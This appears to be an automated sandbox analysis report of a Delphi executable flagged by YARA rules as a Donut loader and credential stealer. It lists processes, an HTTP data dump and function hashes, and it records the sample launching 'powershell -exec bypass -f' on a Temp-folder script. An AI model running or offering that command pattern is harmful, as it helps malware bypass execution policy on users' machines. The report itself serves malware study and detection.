                                                                                                                                                                  2025-01-28 15:16:58 UTC1241INData Raw: 74 6c 65 3d 22 44 61 72 6b 2f 6c 69 67 68 74 20 6d 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c
                                                                                                                                                                  Data Ascii: tle="Dark/light mode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"><
                                                                                                                                                                  2025-01-28 15:16:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  • File
                                                                                                                                                                  • Registry

                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:10:15:41
                                                                                                                                                                  Start date:28/01/2025
                                                                                                                                                                  Path:C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe"
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:79'325'044 bytes
                                                                                                                                                                  MD5 hash:F86C1FB3A2C034C4D3D44A96FD9D6093
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2276511844.0000000000737000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true
                                                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                                  Target ID:4
                                                                                                                                                                  Start time:10:16:57
                                                                                                                                                                  Start date:28/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1"
                                                                                                                                                                  Imagebase:0xd00000
                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:5
                                                                                                                                                                  Start time:10:16:57
                                                                                                                                                                  Start date:28/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Offset: 00719000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_719000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: a[QF$r
                                                                                                                                                                  • API String ID: 0-1978461061
                                                                                                                                                                  • Opcode ID: 66c96110b60ec4884e40784ec229783d02c8652ff8cbc5ba588a45c1a2a673a4
                                                                                                                                                                  • Instruction ID: d96cea96a667b976ec39be989b253526e38af98267d6a3c259233e05204905de
                                                                                                                                                                  • Opcode Fuzzy Hash: 66c96110b60ec4884e40784ec229783d02c8652ff8cbc5ba588a45c1a2a673a4
                                                                                                                                                                  • Instruction Fuzzy Hash: 83B1797640E3D19FC7038B7898A56967FB1AE13210B1E45DBC4C0CF0E3D268695AC7A7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Offset: 00719000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_719000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: a[QF$r
                                                                                                                                                                  • API String ID: 0-1978461061
                                                                                                                                                                  • Opcode ID: 496fad5cb50b8b7599b23414be125da6252d08c30d03b36882e5ded4db30a48d
                                                                                                                                                                  • Instruction ID: 1c7cf25edb3e3dd76e0d3c53df9726371234a66cebb86912a04f91a9c9897a26
                                                                                                                                                                  • Opcode Fuzzy Hash: 496fad5cb50b8b7599b23414be125da6252d08c30d03b36882e5ded4db30a48d
                                                                                                                                                                  • Instruction Fuzzy Hash: C671BE3240E3D19FC703CB7899A1685BFB1BE53214B1D45DAD4C08F4A7D228A96AC7A6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2315999928.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Offset: 00737000, based on PE: false
                                                                                                                                                                  • Associated: 00000000.00000003.2276511844.0000000000737000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_737000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: QQWH
                                                                                                                                                                  • API String ID: 0-2994139501
                                                                                                                                                                  • Opcode ID: 15f92bf1d367a182b2b911103a80d07649b1c7d2d4ae395c48c64e81f543c824
                                                                                                                                                                  • Instruction ID: 3e7d00a824db8bb06332de0195f09c6f3af68370aced01b16df0723b474b60d4
                                                                                                                                                                  • Opcode Fuzzy Hash: 15f92bf1d367a182b2b911103a80d07649b1c7d2d4ae395c48c64e81f543c824
                                                                                                                                                                  • Instruction Fuzzy Hash: E141123244E3C15FE7138B7089AA552BFB0AE13315B1944EFC4C18F0A3E2AC595AC763
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Offset: 00719000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_719000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: a[QF
                                                                                                                                                                  • API String ID: 0-4264035995
                                                                                                                                                                  • Opcode ID: 1901d56a1a29fd2292e8c20859f2a150f3856ea72a3f95cd4161f33c1669df62
                                                                                                                                                                  • Instruction ID: 483ad5229aa4ba27b1344ef492e538fb60a70c00c17c35f96c86b281de6574ca
                                                                                                                                                                  • Opcode Fuzzy Hash: 1901d56a1a29fd2292e8c20859f2a150f3856ea72a3f95cd4161f33c1669df62
                                                                                                                                                                  • Instruction Fuzzy Hash: 4981AC7640E3D19FC703CB789961581BFB1AE53210B1D45DBD4C0CF4A3D228A96ACBA7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Offset: 00719000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_719000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: a[QF
                                                                                                                                                                  • API String ID: 0-4264035995
                                                                                                                                                                  • Opcode ID: fcb9c323dd756e8f8cae2414ee5856f73bb0c628027c9cdfce52dac107201f70
                                                                                                                                                                  • Instruction ID: 59425944e3e68f0f3363c892f07d8e6ea2ca7a51f7b3e78ec723311e75237a21
                                                                                                                                                                  • Opcode Fuzzy Hash: fcb9c323dd756e8f8cae2414ee5856f73bb0c628027c9cdfce52dac107201f70
                                                                                                                                                                  • Instruction Fuzzy Hash: 1D71BC7640E3D19FC703CB789962581BF71AE53210B2D45DBD4C08F4A3D228A96ACBA7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Offset: 00719000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_719000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: a[QF
                                                                                                                                                                  • API String ID: 0-4264035995
                                                                                                                                                                  • Opcode ID: 8f2b074ec315cfc8745205afef82ffc13564b617225d86a8921075cd7475ada0
                                                                                                                                                                  • Instruction ID: 71e57cf3f839f3bbad26398f11c7b9e41bb0618dd1f2d388c37d4e382d97ab9b
                                                                                                                                                                  • Opcode Fuzzy Hash: 8f2b074ec315cfc8745205afef82ffc13564b617225d86a8921075cd7475ada0
                                                                                                                                                                  • Instruction Fuzzy Hash: AB819C7640E3D19FC703CB7899626C57FB1AF53210B1E45DBD4C08F4A3D228696ACBA6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2315999928.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Offset: 00737000, based on PE: false
                                                                                                                                                                  • Associated: 00000000.00000003.2276511844.0000000000737000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_737000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ffbef5d550962080b8a535e66814e933bed3cf14a48b793becf25215819b8bc9
                                                                                                                                                                  • Instruction ID: 7d01c3a2b021918f052d3ea2ccdd239ea2343c8eb2bf4207a9238942505c8778
                                                                                                                                                                  • Opcode Fuzzy Hash: ffbef5d550962080b8a535e66814e933bed3cf14a48b793becf25215819b8bc9
                                                                                                                                                                  • Instruction Fuzzy Hash: 9481643244A3D29FC723CF34C9A16CABFB5EE43320B6842CAD4D18B5A7D3256516D792
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2315999928.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Offset: 00739000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_737000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e6d088f78e8a94eb8445d9d972198c58c506f00bdbcaea7cdbf3233ce817c149
                                                                                                                                                                  • Instruction ID: 7d01c3a2b021918f052d3ea2ccdd239ea2343c8eb2bf4207a9238942505c8778
                                                                                                                                                                  • Opcode Fuzzy Hash: e6d088f78e8a94eb8445d9d972198c58c506f00bdbcaea7cdbf3233ce817c149
                                                                                                                                                                  • Instruction Fuzzy Hash: 9481643244A3D29FC723CF34C9A16CABFB5EE43320B6842CAD4D18B5A7D3256516D792
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2315999928.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Offset: 0073B000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_737000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e6d088f78e8a94eb8445d9d972198c58c506f00bdbcaea7cdbf3233ce817c149
                                                                                                                                                                  • Instruction ID: 7d01c3a2b021918f052d3ea2ccdd239ea2343c8eb2bf4207a9238942505c8778
                                                                                                                                                                  • Opcode Fuzzy Hash: e6d088f78e8a94eb8445d9d972198c58c506f00bdbcaea7cdbf3233ce817c149
                                                                                                                                                                  • Instruction Fuzzy Hash: 9481643244A3D29FC723CF34C9A16CABFB5EE43320B6842CAD4D18B5A7D3256516D792
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2276511844.0000000000704000.00000004.00000020.00020000.00000000.sdmp, Offset: 00704000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_704000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
                                                                                                                                                                  • Instruction ID: ce3f125ba10db27b030a236aa4f528377a642416cc90ca893c8cdaafbff968e5
                                                                                                                                                                  • Opcode Fuzzy Hash: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
                                                                                                                                                                  • Instruction Fuzzy Hash: B12122611092D48FC303CF74D5A4A82BFA1FF8B31A39E40DCC8C18F427C2A56542CB42
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2276511844.0000000000704000.00000004.00000020.00020000.00000000.sdmp, Offset: 00704000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_704000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 185064ec45febd044bc71aaf9ffdb2091f1134970eea16bb721987bc805bfb6f
                                                                                                                                                                  • Instruction ID: fe347770ed016e44368d0e236e89ded51d902b93617c31f7cb10c2ba04f2125b
                                                                                                                                                                  • Opcode Fuzzy Hash: 185064ec45febd044bc71aaf9ffdb2091f1134970eea16bb721987bc805bfb6f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6521037080E3D18FC7239F309865152BFB0AE67214B1A4ACFC1C1CB0E3E6295819CB63

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2494159199.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7050000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'kq$4'kq$4'kq$4'kq
                                                                                                                                                                  • API String ID: 0-1293621312
                                                                                                                                                                  • Opcode ID: 946d6534703c1f80d1cf31ec4b40041b019bd6e52295504abffacbeedb8d9cbb
                                                                                                                                                                  • Instruction ID: c2c9c94f2d0b20d6040386c7a2b05689e7bf86b86182949e69af710e669970da
                                                                                                                                                                  • Opcode Fuzzy Hash: 946d6534703c1f80d1cf31ec4b40041b019bd6e52295504abffacbeedb8d9cbb
                                                                                                                                                                  • Instruction Fuzzy Hash: D30227B1B0421DCFCB259B68980176BBBE2AFC5314F24827ADD15DB391DB36C942C7A1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2479591266.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9b0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c70382b396eb91ed9729607867a6a0cd3d44fef21dd371b7f22f5012c2bdbc7b
                                                                                                                                                                  • Instruction ID: 69851d85de67bd6266af888cd769544a45a3206d6549d6fc170c9980ff718dfa
                                                                                                                                                                  • Opcode Fuzzy Hash: c70382b396eb91ed9729607867a6a0cd3d44fef21dd371b7f22f5012c2bdbc7b
                                                                                                                                                                  • Instruction Fuzzy Hash: FF22B070A042459FCB06CF5CC9949EEBBB1FF49320B2581AAD455DB3A6C735EC91CBA0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2494159199.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7050000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2fc8bab13acbb8b7b68a4df88b90c42d99fe2bf7394de16cb22d8d683604b6f7
                                                                                                                                                                  • Instruction ID: 0c2666a56e17606e892a2bb3f27e371ec5dbd947f41e9af51e877966650e9119
                                                                                                                                                                  • Opcode Fuzzy Hash: 2fc8bab13acbb8b7b68a4df88b90c42d99fe2bf7394de16cb22d8d683604b6f7
                                                                                                                                                                  • Instruction Fuzzy Hash: CE41F3F4B0420DDFCB618F68850276BBBE6AF84394F1883A6DD059F295D735C941C7A1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2479591266.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9b0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 50efe8282929f8d7189ebbb9196378ac7f61d8743820a22e5f7f5e646576e7ca
                                                                                                                                                                  • Instruction ID: b206b87cd86fdba2b28dcb39921541751af3bf28734f9fe5aff9d0e8fa7f83e1
                                                                                                                                                                  • Opcode Fuzzy Hash: 50efe8282929f8d7189ebbb9196378ac7f61d8743820a22e5f7f5e646576e7ca
                                                                                                                                                                  • Instruction Fuzzy Hash: 32514674A001099FCB05CF99C594AEEF7B1FF48320B208269D526AB2A5C736EC51DF90
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2479591266.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9b0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: eee9e942474e703823d75813f5675782cdc98fd7a569f2434cae9bb57af4eec9
                                                                                                                                                                  • Instruction ID: c1140b7646c20b610da4f42db2aec10b39a19cb9befa964a49c6c15cc5441f57
                                                                                                                                                                  • Opcode Fuzzy Hash: eee9e942474e703823d75813f5675782cdc98fd7a569f2434cae9bb57af4eec9
                                                                                                                                                                  • Instruction Fuzzy Hash: 5E4127B4A005098FCB09CF99C598AAEFBB1FF48320B25816AD515AB365C735FC50DFA4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2479591266.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9b0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 309550729bdfcdb1539f488fd162e447a9025148c6f7f9ecd629fc0f2f4306b4
                                                                                                                                                                  • Instruction ID: 64ead4cb024f985eef81d5c56ba2d834c6901aaf1375afd7560de17d529f229c
                                                                                                                                                                  • Opcode Fuzzy Hash: 309550729bdfcdb1539f488fd162e447a9025148c6f7f9ecd629fc0f2f4306b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F316BB49005058FCB09CF99C598AFAF7B1FF44324B258669D4129B2AAC736BC50DF94
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2479591266.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9b0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: fa44da9a803955c7847144792b45b1cc6c1fe1f6551297c04291f66a6e05ceb2
                                                                                                                                                                  • Instruction ID: 6d761bae9f21b88986306a379372f39e6d7cb694ceb4d91b2ec85e4f8411c4c7
                                                                                                                                                                  • Opcode Fuzzy Hash: fa44da9a803955c7847144792b45b1cc6c1fe1f6551297c04291f66a6e05ceb2
                                                                                                                                                                  • Instruction Fuzzy Hash: 20215BB4A04219CFCB00DF9CC5809AEBBB4FF89310B14859AE409EB396C735ED41CBA1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2479591266.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9b0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 935660908893f488cb7d1d5b43ffa5e1dbbed081a1d76c6cacfc3e88cfcc3208
                                                                                                                                                                  • Instruction ID: 0ed98a0b159f50b9d32dc22280135333e0c8a6d0bfae8b66174b0e7c58d71455
                                                                                                                                                                  • Opcode Fuzzy Hash: 935660908893f488cb7d1d5b43ffa5e1dbbed081a1d76c6cacfc3e88cfcc3208
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D11E478A00209DFCB00DF9CD584AAEBBB5FF89310B148599E809AB755C736FD41CBA0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2477311582.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_71d000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 94dc641c456413b04c1843730e532591c89a6c5a4f71963051b4c02a8a956471
                                                                                                                                                                  • Instruction ID: 419ea7cb61857e6d90182300cc835af174eb04fa123000c309734cc4e7b35284
                                                                                                                                                                  • Opcode Fuzzy Hash: 94dc641c456413b04c1843730e532591c89a6c5a4f71963051b4c02a8a956471
                                                                                                                                                                  • Instruction Fuzzy Hash: F601A7715093409AE7204A2DCDC47A7BF98EF49324F18C529ED484A186C67D9CC5CAB1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2479591266.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9b0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 280c2bbf05a117d692fda122d22b28022792279ab3d366d55d2583ef26e999dc
                                                                                                                                                                  • Instruction ID: 00a91b50774bbdfb102e7899524c32d6e342ffb744d0c430591220b4a1fec4e3
                                                                                                                                                                  • Opcode Fuzzy Hash: 280c2bbf05a117d692fda122d22b28022792279ab3d366d55d2583ef26e999dc
                                                                                                                                                                  • Instruction Fuzzy Hash: 1BF0C2256092948FC702EA5C98600EABF75EFC6214B1880D6C8448B267D521DC5BC7A1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2477311582.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_71d000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 496a642d0ab38df472add127acfd59d160fce66b2c5fa68534a09ec9cf818dd8
                                                                                                                                                                  • Instruction ID: 636c0fa8b449b46c3d2a0038483fc4c6f7fbd60e00e94d96a1a507ebdcc15665
                                                                                                                                                                  • Opcode Fuzzy Hash: 496a642d0ab38df472add127acfd59d160fce66b2c5fa68534a09ec9cf818dd8
                                                                                                                                                                  • Instruction Fuzzy Hash: B3F09671405344AEE7208E1ACDC4BA3FFA8EF55734F18C55AED484F286C2799C85CAB1

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2494159199.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7050000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq
                                                                                                                                                                  • API String ID: 0-801068408
                                                                                                                                                                  • Opcode ID: 56471b422c0e3b1918dc880bb1628e930ad265a07bc4e892905e0f48c3f9faa9
                                                                                                                                                                  • Instruction ID: 921df30a39ad9e727fd910b621da5c9926f6d4e2119a1788ab00c53eb74acaf4
                                                                                                                                                                  • Opcode Fuzzy Hash: 56471b422c0e3b1918dc880bb1628e930ad265a07bc4e892905e0f48c3f9faa9
                                                                                                                                                                  • Instruction Fuzzy Hash: EF8135B17043058FCB658B78D80176FBBE6AF86310F28817ADD45CB391DA36C842C7A1
